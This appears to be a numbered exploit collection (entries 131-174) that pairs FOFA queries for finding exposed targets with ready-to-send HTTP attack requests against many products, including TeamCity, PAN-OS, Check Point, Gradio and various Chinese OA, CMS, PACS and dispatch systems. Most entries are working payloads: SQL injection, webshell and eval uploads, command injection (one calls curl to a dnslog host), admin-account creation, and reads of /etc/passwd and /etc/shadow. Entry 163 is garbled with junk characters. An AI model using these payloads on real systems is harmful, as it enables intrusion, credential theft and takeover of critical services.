Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter passes the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path echoed in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 (INFINITT PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

1 D) _( u/ m  B  R. S163. 号卡极团分销管理系统 ue_serve.php 任意文件上传7 O7 G7 ?& c7 g, @% g$ t
FOFA: icon_hash="-795291075"# U9 \7 Y7 r9 x$ U0 D1 H: A
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.18 X% F6 M& G: f, {+ M0 @
Host: x.x.x.x. j% V- i, s# v+ P1 Z9 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. Z5 Z6 A2 V$ @: ]: j. l& ZConnection: close
- c( ~; T' C# J' ?$ t" PContent-Length: 2936 q' X; Z; y! G
Accept: */*! U. }7 `9 i) o
Accept-Encoding: gzip, deflate
% B( d+ D$ ?  ]Accept-Language: zh-CN,zh;q=0.9
9 ?2 e. t- |5 c) f+ M4 Z, J  L1 R9 jContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
5 z6 X0 q% o$ Y& ?' q7 I" f: `
" x) R8 q4 Z* t, N* U3 M------iiqvnofupvhdyrcoqyuujyetjvqgocod! ], f. _. K: E4 v! b
Content-Disposition: form-data; name="name"
! x: x& R1 T) B9 e1 Z! z3 ]5 [
+ l$ o$ _. O3 Z' q. H1.php
% I0 {$ p' t& A' z* E------iiqvnofupvhdyrcoqyuujyetjvqgocod6 i( r$ B9 l% R1 |9 \' ~
Content-Disposition: form-data; name="upfile"; filename="1.php"
( ], ^' F- O$ L( i; M& yContent-Type: image/jpeg, ?- g8 W8 v; @! h
% u2 X% b8 }7 ~8 J
rvjhvbhwwuooyiioxega
0 C5 w8 }5 v2 l7 B% e* m------iiqvnofupvhdyrcoqyuujyetjvqgocod--
0 M" R, j; C! B5 r0 X; u
# c8 X% F  a, M4 s$ M" c: l; T3 P7 e4 Q! W
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
